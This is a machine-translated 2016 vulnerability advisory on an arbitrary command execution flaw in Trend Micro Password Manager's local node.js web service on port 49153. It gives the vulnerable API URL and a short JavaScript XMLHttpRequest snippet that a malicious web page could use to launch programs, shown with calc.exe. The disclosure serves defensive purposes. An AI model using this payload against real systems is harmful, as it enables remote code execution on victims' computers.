Trend Micro Password Manager program arbitrary command execution vulnerability verification-vulnerability and early warning-the black bar safety net

2016-01-16T00:00:00
ID MYHACK58:62201671066
Type myhack58
Reporter 阿尔法实验室 kernux
Modified 2016-01-16T00:00:00

Description

Trend Micro antivirus software to suit the windows version, contains a password management program, the program is also in the official website provides a single download connection, is a free service. The default installation of the latest TRAND Micro: the

! 1

Figure 1

Can in Data Security find this password management program, the default is open, you can see in the local port listening:

! 2

Figure 2

Listening port is 4 9 1 5 3, google analysis given in 4 9 1 5 5, it seems this port should be in a range. This service is a node. js developed the http server program, in this url exist at the arbitrary command execution vulnerability:

<https://localhost:49153/api/openUrlInDefaultBrowser?url=cmd>

This api could have been used to in the browser to open a page:

! 3

Figure 3

However, it can also open the system path:

! 5

Figure 4

Which in turn can open the path in the file:

! 6

Figure 5

Finally, even the executable files are also a cinch, the function is really powerful Ah. to:

<https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe>

! 7

Figure 6

This vulnerability is that, as long as the attacker in the page is inserted into a similar such request:

|

1

|

x = new XMLHttpRequest()

---|---

1

|

x. open("GET", "https://localhost:49153/api/openUrlInDefaultBrowser?url=c:/windows/system32/calc.exe true);

---|---

1

|

try { x. send(); } catch (e) {};

---|---

You can install TrendMicro windows on the system, execute arbitrary commands, and the harm can be imagined.